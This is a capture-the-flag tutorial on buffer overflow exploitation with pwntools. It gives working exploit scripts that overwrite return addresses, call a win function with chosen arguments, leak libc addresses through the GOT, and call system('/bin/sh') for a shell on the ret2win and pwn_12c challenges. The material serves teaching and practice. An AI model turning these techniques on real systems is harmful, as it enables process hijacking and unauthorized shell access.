How2BufferFlow

July 16th 2021

How 2 buffer(over)flow

A detailed step for step guide on how to exploit simple buffer overflows and more.

Examples will include these binaries:

ret2win (Easy; basic bufferoverflow)
pwn_12c (Easy & Medium, 2 challs in one)
ropncall (Medium; Ropping required)
Librarian 3 (Hard; longer exploit)

And there's also some more information:

Leo's lecture about it

Structure of ELFs and some data gathering

This is a long explanation of what a cool little tool does for you automatically. If you only want to see the tool in action, skip to the next section.

So before we can actually exploit something we need to see what we can use. For this the readelf tool from binutils is a great tool.

If we run readelf -l <binary> on any of the provided binaries, we get a short summary of all the segments that matter when the program is started. There are different types, but for now all we care about are the "LOAD" segments. For each one we can read the offset in the file (in bytes), the virtual address the segment should be loaded at, the size of the segment and which flags it will have once it's loaded.

The most important segments are the ones with an "E" in the flags, since those are the segments with the code. If there's a segment with "RWE", then nothing stops somebody from overwriting the code you're executing or from executing data as code (generally W^X is enforced though, so no segment is writable and executable at the same time).
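To make the flag column a bit less magic, here is a minimal sketch of how those letters map onto the p_flags bits of a program header (PF_X = 1, PF_W = 2, PF_R = 4 in the ELF specification). The helper names decode_flags and violates_wx are made up for this guide; readelf does all of this for you.

```python
# ELF program header flag bits (values from the ELF specification).
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def decode_flags(p_flags: int) -> str:
    """Render p_flags in the readelf style, e.g. 'R E' or 'RW '."""
    return "".join(
        letter if p_flags & bit else " "
        for letter, bit in (("R", PF_R), ("W", PF_W), ("E", PF_X))
    )


def violates_wx(p_flags: int) -> bool:
    """True if the segment is writable and executable at the same time."""
    return bool(p_flags & PF_W) and bool(p_flags & PF_X)


for flags in (PF_R | PF_X, PF_R | PF_W, PF_R | PF_W | PF_X):
    print(repr(decode_flags(flags)), "W^X violated:", violates_wx(flags))
```

Only the last of the three example values is the "RWE" case described above.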

Another thing you might see is that the virtual address of the first segment is zero, the next one starts at roughly the size of the first, the one after that at roughly the sum of the previous segments, and so on. This indicates that the binary was compiled with the -fPIE (or equivalent) switch, which makes the binary loadable at any address, as long as everything stays at the same relative offsets (Position Independent Code). This makes exploitation considerably harder, since we don't know at which address the binary was loaded (Address Space Layout Randomization will put it at a random address).
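If you'd rather not eyeball the addresses, the ELF header states the file type directly: e_type is ET_EXEC (2) for a fixed-address executable and ET_DYN (3) for a position independent one. Here is a rough sketch that reads this field; the function name looks_like_pie is my own, and note that shared libraries are ET_DYN as well, so this is only a hint. The header below is synthetic so the snippet runs on its own; for a real binary you would pass the first 18 bytes of the file.

```python
import struct

ET_EXEC, ET_DYN = 2, 3  # e_type values from the ELF specification


def looks_like_pie(header: bytes) -> bool:
    """Check e_type in the first 18 bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # e_ident[5] (EI_DATA) is 1 for little endian, 2 for big endian.
    endian = "<" if header[5] == 1 else ">"
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    return e_type == ET_DYN


# Synthetic 64-bit little-endian headers, just for demonstration.
e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)
pie_header = e_ident + struct.pack("<H", ET_DYN)
fixed_header = e_ident + struct.pack("<H", ET_EXEC)

print(looks_like_pie(pie_header), looks_like_pie(fixed_header))
```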

Intro to pwntools

Run pip install pwntools to get the pwn tools you need to exploit all the binaries (seriously pwntools is great). Make sure you install it in such a way that the installed binaries are in your path (Easiest to do if you install with root; if they're not in your path pip will warn you about that after installing)

Now if you get a pwn challenge all you need to do is to run pwn template --host remote --port port binary > exploit.py and then you have a nice template to work with (You can leave the --host and --port if you don't have a remote; check the help page of pwn template for more information).

In the template you will also have a comment listing some things we manually deciphered from readelf before: namely the PIE status and, if there's no PIE, the base address. It also tells you if there's RELocation Read Only (RELRO), the NX bit (no-execute for data, which would be disabled if there's an RWX segment), and if there's a stack canary. The stack canary is simply a random value placed on the stack between the local variables and the saved return address. It is set at the beginning of the function and checked before returning, so a buffer overflow that modified it on its way to the return address is detected.

Now you can run that template with some flags: GDB will start a gdb attached to the program, LOCAL will launch it locally (Default is on the server if you have specified a host and a port), DEBUG will print all the bytes that are sent and received, NOASLR will (try to) disable ASLR and make the addresses predictable and there are some more, but these are the most important ones.

Now let's look at what we need to do in the code to interact with the binary. There should be a short example of what you can do. All the interactions with the binary will be done with the io object. To log you can use info("x is: 0x%x", number) or debug with the same printf-like syntax (Or just use print, I don't care)

The io object is a "Tube", which just means that it's a wrapper around the binary such that no matter how you execute it, the interaction will be the same. There are a few interaction methods implemented: sockets (remote), subprocesses (local) and some more obscure ones like SSH and Serial. But in all cases, after getting the io object, the functions will be the same.

Sending

To send you can simply do io.send(data) or io.sendline(data) if you want to have the newline appended automatically.

Receiving

To read you can do io.recv(num) for up to num bytes (io.recvn(num) if you need exactly that many), io.recvline() to read a line, or io.recvuntil("waiting_for"), which will wait until the binary prints "waiting_for". (The latter accepts both bytes and strings.)

Interacting

Once you've got a shell, or if you simply want to play with the binary, you can call io.interactive(), which will hand the io over to your stdin/stdout for you to interact with.

Packing / Unpacking ints

To send 32 or 64 bit integers as raw bytes you have the methods p32 and p64, to convert a set of 4, or 8, bytes into a 32, or 64, bit integer you have u32 and u64. Make sure the buffers are the correct lengths when unpacking.
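If you're wondering what these helpers actually do, here are plain-Python stand-ins built on the struct module, assuming the little-endian default that pwntools uses. The names pack32, pack64, unpack32 and unpack64 are mine, chosen so they don't shadow the real pwntools functions.

```python
import struct


def pack32(value: int) -> bytes:
    return struct.pack("<I", value)  # 32-bit unsigned, little endian


def pack64(value: int) -> bytes:
    return struct.pack("<Q", value)  # 64-bit unsigned, little endian


def unpack32(data: bytes) -> int:
    return struct.unpack("<I", data)[0]  # struct.error unless len(data) == 4


def unpack64(data: bytes) -> int:
    return struct.unpack("<Q", data)[0]  # struct.error unless len(data) == 8


print(pack32(0x1337C0D3))            # lowest byte comes first
print(hex(unpack32(b"\xef\xbe\xad\xde")))
```

The length check in the unpack functions is the reason you have to be careful with the buffer sizes: three or five bytes will simply raise an error.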

cyclic

There's a neat little function called cyclic: it takes an integer parameter and spits out that many bytes of a pattern in which every four-byte window is unique. If you have four bytes of that pattern, you can identify at what position they were with the function cyclic_find("...."), which is especially useful for buffer overflows and detecting how many bytes you have to overflow (I mean you can always just calculate it from the stack pointer in the disassembly, up to you).
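For the curious: the pattern is a de Bruijn sequence over the lowercase alphabet with window length 4. Below is a small sketch of the standard generator for such sequences; I'm assuming this matches what pwntools produces by default, and pattern and find_offset are names I made up for the illustration.

```python
from itertools import islice
from string import ascii_lowercase


def de_bruijn(alphabet: str, n: int):
    """Yield a de Bruijn sequence: every length-n window occurs only once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern(length: int) -> str:
    return "".join(islice(de_bruijn(ascii_lowercase, 4), length))


def find_offset(chunk: str, length: int = 200) -> int:
    return pattern(length).find(chunk)  # -1 if the chunk is not in the pattern


print(pattern(16))
print(find_offset("jaaa"), find_offset("naaa"))
```

The two chunks looked up at the end are the ones that show up in the crashes later in this guide.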

fit

fit is another cool function which takes a dictionary and makes the values fit at the position (key), so for the dict {0: "123", 6: "456", 12: "1111111"}, fit will produce b'123aba456aaa1111111'. The spaces where there's nothing are filled with the same pattern as cyclic produces, inputs are either strings or byte objects but output is always a byte object.

shellcraft & rop

Useful for shellcoding and ropping, but I'll be doing everything manually in this guide, since we're here to learn how2bufferflow, not how to use pwntools (But seriously, you should look into them too, makes ropping easier)

The exe object

The template automatically made an object exe for you. With it you can access symbols, the got and the plt very easily. Even if the binary has no symbols, if it is dynamically linked, the got and plt will contain functions with names (since they are resolved by name at runtime).

To get the offset/address of a symbol you can do exe.sym["name"], for example if you want the address of the main function you can do exe.sym["main"]. Alternatively you can do exe.sym.main if you like that syntax more. The same can be done with the plt/got tables. Just do exe.got["puts"] to get the address for puts in the got and exe.plt["puts"] to get the address/offset of puts in the plt. To get the address of the start of the bss you can do exe.bss().

Now that I told you how to get those values, what are they for? Well, the Procedure Linkage Table contains small stubs that lazily resolve library functions (meaning a function's address is only looked up when you call it for the first time). Once the function has been resolved, the Global Offset Table holds the pointer to it and the plt stub just jumps to that pointer. The bss is just uninitialized data, so it lives in a read/write segment. In programming languages this holds globals / static variables which are accessible over the entire program but which are not malloced.

So if you want to call a function from a library, you do that over the plt, if you want the pointer of a library function you look in the got (Useful for leaking libc addresses :P)
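As a mental model only, here is a toy simulation of that lazy binding in Python. Nothing here resembles the real dynamic linker; ToyProcess, call_via_plt and the address in LIBC are all invented for illustration. The point is just that a got slot holds nothing useful until the function has been called once.

```python
# Hypothetical resolved address, standing in for wherever libc got loaded.
LIBC = {"puts": 0xF7E2B4C0, "gets": 0xF7E2AB10}


class ToyProcess:
    def __init__(self, imports):
        # Before the first call no slot holds a libc pointer yet.
        self.got = {name: None for name in imports}
        self.resolutions = 0

    def call_via_plt(self, name: str) -> int:
        if self.got[name] is None:
            # First call: the stub asks the "linker" and caches the result.
            self.got[name] = LIBC[name]
            self.resolutions += 1
        # Every later call just jumps through the cached got pointer.
        return self.got[name]


proc = ToyProcess(["puts", "gets"])
proc.call_via_plt("puts")
proc.call_via_plt("puts")
print(proc.got, proc.resolutions)
```

After the two calls, the puts slot holds an address while the gets slot is still empty, which is why you can only leak functions the program has already called.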

The first bufferflow [ret2win]

First things first, open the file in any disassembler/decompiler (Doesn't really matter if you use ghidra, ida, binary ninja, cutter, ...) You just have to find the main() function (be aware, binary ninja optimizes stuff out here!) You should get something like this: (Ghidra output of main)

undefined8 main(void)

{
  undefined local_24 [12];
  undefined local_18 [12];
  uint local_c;

  setvbuf(stdout,(char *)0x0,2,0);
  setvbuf(stdin,(char *)0x0,2,0);
  local_c = 0xdeadbeef;
  puts("Casual stroll wont do, step somewhere specific");
  __isoc99_scanf("%20s",local_18);
  if (local_c == 0x1337c0d3) {
    puts("Check");
    __isoc99_scanf("%44s",local_24);
  }
  return 0;
}

so we see that we first read 20 chars into local_18 and, if another variable (which sits right after local_18) has a certain value, we do another read with more characters. If you just try to input 20 characters into the binary you'll see that it just exits, so first we need to make sure we get it to crash (by overwriting the return address). To do so, we first need to overflow the value in local_c, so we do

io = start()
io.sendline(cyclic(12) + p32(0x1337c0d3))
io.interactive()

and voilà, we get into the if statement. Why we chose 12 should be clear from the stack layout (The local_c is directly after the local_18, the size of which being 12, so just overflow it). Next we want to figure out if we crash, so we extend the exploit to this:

io = start()
io.sendline(cyclic(12) + p32(0x1337c0d3))
io.recvuntil("Check")
io.sendline(cyclic(44)) # we read 44 chars in the second scanf
io.interactive()

and sure enough we get a SIGSEGV, so time to add GDB to the parameters and investigate. If you don't have any gdb extensions installed to help you with debugging, I can suggest gdb-peda, pwndbg or gef.

If you get an error that you need to set "terminal", then you need to first start tmux (such that the script can multiplex the output and gdb in the same terminal window). If you don't like the splitting top and bottom, but would rather have left and right, then just add context.terminal = ["tmux", "split", "-h"] into your exploit script (Before calling io=start())

Next, just enter a c into gdb to continue execution and wait for it to trigger the segfault. It should stop at a ret instruction and you should see the return address on the stack, which should be "jaaakaaa" if you read it as a string.

Now we just have to find the offset we need to write the return address we want. Oh lucky us that there is cyclic_find, so open an interactive python shell, from pwn import * and do cyclic_find("jaaa") to get the offset of 36. The challenge name indicates that we should return to the function called "win", so let's just do that. We know that there's no PIE (thanks pwntools), so all addresses are fixed, so we just take the address of the win function with the symbols of the file.

So we update our exploit like this:

io = start()
io.sendline(cyclic(12) + p32(0x1337c0d3))
io.recvuntil("Check")
io.sendline(fit({36: p64(exe.sym.win) }))
io.interactive()

the fit function will make our payload such that the 64-bit return address will be at offset 36. And we're done and get the flag :)
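To see the raw bytes behind those two sendline calls, here is a sketch that builds both stages with nothing but struct. WIN_ADDR is a made-up address (the real one comes from exe.sym.win), and I use plain "A"/"B" padding instead of the cyclic filler. Since scanf with %s stops at whitespace, the sketch also checks that neither stage contains a whitespace byte.

```python
import struct

WIN_ADDR = 0x401196  # hypothetical; use exe.sym.win in the real exploit
WHITESPACE = b" \t\n\v\f\r"  # bytes at which scanf("%s") stops reading

# First scanf("%20s"): 12 bytes fill local_18, the next 4 land in local_c.
stage1 = b"A" * 12 + struct.pack("<I", 0x1337C0D3)

# Second scanf("%44s"): 36 bytes of padding, then the 64-bit return address.
stage2 = b"B" * 36 + struct.pack("<Q", WIN_ADDR)


def survives_scanf(payload: bytes, limit: int) -> bool:
    """True if the payload fits the width limit and has no whitespace bytes."""
    return len(payload) <= limit and not any(b in WHITESPACE for b in payload)


print(len(stage1), survives_scanf(stage1, 20))
print(len(stage2), survives_scanf(stage2, 44))
```

If your real win address happens to contain a byte like 0x20 or 0x0a, the second check fails and you would need another address to return to.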

The second bufferflow [pwn_12c easy part]

Well, template and ghidra go brrrr. Again the goal is to call the win function, this time we have to pass some arguments too though. Luckily this time we have a gets, which means we're not limited by character counts.

So first we need to determine the length of stack variables

io = start()
io.sendline(cyclic(100)) # should well overflow anything
io.interactive()

again, start with GDB and continue until you get the segfault, look at the top of the stack (or the current EIP/RIP value if it tried to jump there) and search for the first four characters' offset in the cyclic pattern. In our case it jumped to the address, before realizing that there's nothing there. So in EIP we have 0x6161616e and peda kindly tells us that that is "naaa". Thus our offset is 52.

An alternative to this dynamic approach would be to compute the offset based on the RBP/EBP inside the function. In this example, if we look at the disassembly we see that it does 08049273 8d 45 d0 LEA EAX=>local_34,[EBP + -0x30] to load the address of the buffer for the gets call. So we could just compute the return address to be at 0x30 + 4 = 0x34 == 52 (since the old EBP sits right before the return address, and EBP points to that old EBP value).

So now let's debug it with this exploit: (Launch with GDB and set a breakpoint in win, by typing break win before doing c)

io = start()
payload = p32(exe.sym.win) + cyclic(20) # return address, then a pattern to spot the arguments
io.sendline(fit({52:payload})) # the return address sits at offset 52
io.interactive()

Once there, single step (by doing ni) to the first compare. There we can inspect the value of the first argument by doing x/wx $ebp+8, which win expects to be 0xdeadbeef. We see that it is 0x61616162 ("baaa"). Interesting, let's continue with the second parameter at $ebp+12 and we see that it's 0x61616163 ("caaa"). So our arguments are just the bytes on the stack after the return address, skipping another four bytes which act as win's own return address (for 32 bit programs at least), so let's just put that into our payload:

io = start()
# win address | fake return address for win | arg 1 | arg 2 | arg 3
payload = p32(exe.sym.win) + b"aaaa" + p32(0xdeadbeef) + p32(0xba5eba11) + p32(0x1337c0de)
io.sendline(fit({52:payload})) # the return address sits at offset 52
io.interactive()

and we pass all the checks, hooray, 1/2 done with this challenge.
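The same payload can be spelled out by hand, which makes the 32-bit stack layout explicit. This is only a sketch: WIN_ADDR is a placeholder I invented (take the real one from exe.sym.win), and the padding is plain "A" bytes rather than the cyclic filler that fit uses.

```python
import struct

WIN_ADDR = 0x080491F6  # hypothetical; use exe.sym.win in the real exploit

BUF_TO_EBP = 0x30      # from LEA EAX,[EBP + -0x30]
SAVED_EBP = 4          # the old EBP sits between the buffer and the return address
ret_offset = BUF_TO_EBP + SAVED_EBP

payload = b"A" * ret_offset
payload += struct.pack("<I", WIN_ADDR)  # overwritten return address -> win
payload += b"aaaa"                      # where win itself would return to (junk)
payload += struct.pack("<III", 0xDEADBEEF, 0xBA5EBA11, 0x1337C0DE)  # args 1..3

# gets stops at a newline, so the payload must not contain one.
assert b"\n" not in payload
print(ret_offset, len(payload))
```

Inside win, after the usual push ebp / mov ebp, esp, the junk word ends up at ebp+4 and the three arguments at ebp+8, ebp+12 and ebp+16, which matches what we saw in gdb.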

The shell exploit [pwn_12c medium part]

This time we need to exploit the same binary as before, but we need to get a shell, i.e. launch "/bin/sh" or a similar program. We already know the correct offset, so we just need to adjust our payload to do the right thing. We can trivially call system through its entry in the .plt section. The hard part is getting a "/bin/sh" string into the program and a pointer to it onto the stack (since that is the argument we want system to execute). First I'll show the intended version since that's harder than my solution. For it we need to leak the libc address, because there are "/bin/sh" strings in libc, but at different addresses for each version.

As I said, to call a function we call it in the plt and to get its address we look into the got. So to leak an address from libc we can simply call the libc function puts, which the program uses (thus the resolved address is certainly in the got), and pass it a got address.

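io = start()
# puts@plt | fake return address | argument: address of the got entry of puts
payload = p32(exe.plt.puts) + b"aaaa" + p32(exe.got.puts)
io.sendline(fit({52:payload})) # the return address sits at offset 52
io.recvuntil("flag!\n")
x = u32(io.recv(4)) # first four bytes printed are the resolved puts address
info("Got puts address: %x", x)
io.interactive()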

with this we can leak a single address, but to know which version of libc the remote has, we need more. Luckily the 4 bytes after the first puts address are only its return address and not an argument, so we can put a second puts there and interleave two calls to puts with different got entries.

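io = start()
# puts@plt | puts@plt (return address of 1st call) | got.puts (arg of 1st call) | got.gets (arg of 2nd call)
payload = p32(exe.plt.puts) + p32(exe.plt.puts) + p32(exe.got.puts) + p32(exe.got.gets)
io.sendline(fit({52:payload})) # the return address sits at offset 52
io.recvuntil("flag!\n")
x = u32(io.recv(4))
info("Got puts address: %x", x)
io.recvline() # clear the rest of the line from the first puts
x = u32(io.recv(4))
info("Got gets address: %x", x)
io.recvline() # clear the rest of the line from the second puts
io.interactive()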

Make sure you use functions which are already resolved in the got (i.e. they were called at least once before your leak runs). When you have the addresses of two functions, you can use the libc db to find out which version of libc the remote server is running. The website even has useful exploitation information, like str_bin_sh 0x195b84, which means for us that there's a "/bin/sh" at offset 0x195b84 in libc.

Now our final exploit can finally begin to take form. First we need to leak a single address from libc, but then we need to send input a second time to pass the address of the /bin/sh string, computed with the correct libc base address. This is easily done by returning into the "run" function again and repeating the overflow, so first we leak the libc address like earlier, but return to run() instead of segfaulting:

io = start()
# puts@plt | return into run() for a second overflow | argument: got entry of puts
payload = p32(exe.plt.puts) + p32(exe.sym.run) + p32(exe.got.puts)
io.sendline(fit({52:payload})) # the return address sits at offset 52
io.recvuntil("flag!\n")
x = u32(io.recv(4))
info("Got puts address: %x", x)

io.interactive()

Now we have everything for the base address and the offset to a /bin/sh string, so let's just combine it right away:

io = start()
# stage 1: leak puts and return into run() for a second overflow
payload = p32(exe.plt.puts) + p32(exe.sym.run) + p32(exe.got.puts)
io.sendline(fit({52:payload})) # the return address sits at offset 52
io.recvuntil("flag!\n")
x = u32(io.recv(4))
info("Got puts address: %x", x)
# stage 2: system@plt | fake return address | pointer to "/bin/sh" inside libc
payload = p32(exe.plt.system) + b"aaaa" + p32(x + 0x195b84 - 0x714c0) # leaked puts - puts offset + str_bin_sh offset
io.sendline(fit({52:payload})) # same offset again, since we are back in run()
io.interactive()

the offsets 0x714c0 (puts) and 0x195b84 (str_bin_sh) are both taken straight from libc.rip. We subtract the puts offset from the leaked puts address to get the libc base address and then add the str_bin_sh offset to get the address of the string. And that's it, we got a shell (At least I get one on my machine; those offsets are for my libc, so they will most likely differ on your system!)
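The address arithmetic is easy to get wrong, so here it is once more as a standalone sketch. The two offsets are the ones from the text above; the leaked bytes are invented for the example. The page-alignment check at the end is a common sanity test (a libc base normally ends in 000), not something pwntools does for you.

```python
import struct

PUTS_OFFSET = 0x714C0  # offset of puts in my libc (from libc.rip, see above)
STR_BIN_SH = 0x195B84  # offset of "/bin/sh" in the same libc

# Hypothetical output of puts(got.puts): puts keeps printing until it hits a
# NUL byte, so more than four bytes can arrive before the trailing newline.
leak = bytes.fromhex("c0b4e2f7") + b"\x10\x5f\xe0\xf7\n"

puts_addr = struct.unpack("<I", leak[:4])[0]  # only the first 4 bytes matter
libc_base = puts_addr - PUTS_OFFSET
bin_sh = libc_base + STR_BIN_SH

# A base that is not page aligned usually means the wrong libc version.
assert libc_base & 0xFFF == 0, "libc base is not page aligned"
print(hex(puts_addr), hex(libc_base), hex(bin_sh))
```

If the assertion fires on the remote, go back to the libc db with your two leaked addresses before blaming the payload.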
